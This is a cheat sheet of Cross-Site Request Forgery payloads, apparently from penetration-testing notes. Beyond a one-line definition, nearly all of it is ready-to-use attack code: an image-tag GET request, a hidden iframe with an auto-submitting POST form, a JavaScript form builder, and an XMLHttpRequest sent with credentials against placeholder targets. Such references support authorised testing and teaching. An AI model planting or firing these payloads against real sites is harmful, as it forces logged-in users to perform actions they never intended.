CSRF
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.
GET
image
<img src="https://target.site/path?query" />
POST: application/x-www-form-urlencoded
iframe
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
JavaScript Form
<script>
method = "post|get"
path = "http://target.site/path?query"
params = {criticaltoggle: "true", randomparam: "randomvalue"}
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for(var key in params) {
if(params.hasOwnProperty(key)) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
}
document.body.appendChild(form);
form.submit();
</script>
JavaScript AJAX
Depending on the Cross-Origin Resource Sharing (CORS) configuration, you might trigger a function vulnerable to a CSRF using AJAX.
<script>
var xh = new XMLHttpRequest();
xh.open("[METHOD]", "https://target.site/path?query", true);
xh.withCredentials = true;
xh.onreadystatechange = function(){
switch(this.readyState) {
case this.OPENED:
console.log("[*] CSRF request sent");
break;
case this.HEADERS_RECEIVED:
console.log("[*] CSRF response status: " + this.status);
break;
case this.DONE:
console.log("[*] CSRF response received");
break;
}
}
xh.send();
</script>
Tip
If you need to perform multiple requests in a loop, you must include all the above line within the loop in order to prevent async issues.
References:
- https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest
- https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS